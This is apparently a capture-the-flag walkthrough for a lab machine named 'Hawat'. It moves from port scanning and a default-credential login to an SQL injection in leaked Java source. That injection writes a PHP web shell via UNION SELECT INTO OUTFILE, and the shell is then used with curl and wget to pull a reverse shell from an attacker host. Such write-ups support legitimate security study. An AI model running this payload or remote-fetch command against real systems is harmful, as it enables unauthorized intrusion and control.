HAWAT

1-NMAP

nmap -p- -T4 -vv -sV 192.168.219.147

PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 8.4 (protocol 2.0)
17445/tcp open   unknown
30455/tcp open   http         nginx 1.18.0
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)

2-PORT 50080

Doing a directory search with the Gobuster tool we found the directory /cloud on port 50080, where we get a login:

Trying admin/admin we manage to log in, and we see that there is a file that catches our attention called issuetracker.zip:

We download it and when we unzip it we see that it is the source code for the port 17445 website:

3-Vuln SQL

Doing some research we found a file called IssueController.java in which there is a SQL vulnerability:

If we go to the page we will be redirected to the login page, so after logging in we will see the following:

This means that the method we are using is not the correct one, so we are going to capture the request with BurpSuite and change it to POST:

As we can see we get a 302 error, this is because to perform the SQL injection we have to add the priority parameter and it will take 5 seconds to reload the page:

Now we can make a web shell, the only thing we need to know is the path to the server, we can know this because on port 30455 there is a phpinfo.php file that we found with go buster:

Now that we know which one it is, we just need to create the web shell:

Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+

4-Web Shell

We can now execute commands:

The next step is to generate a reverse shell, we will use the one in the route

curl 'http://192.168.219.147:30455/cmd.php?cmd=wget%20http://192.168.45.237:443/php-reverse-shell.php%20-O%20/srv/http/reverse2.php'

5-Root

After this we only have to make a request to the URL and listen on port 443:

PreviousESCAPE NextPage

Last updated 11 months ago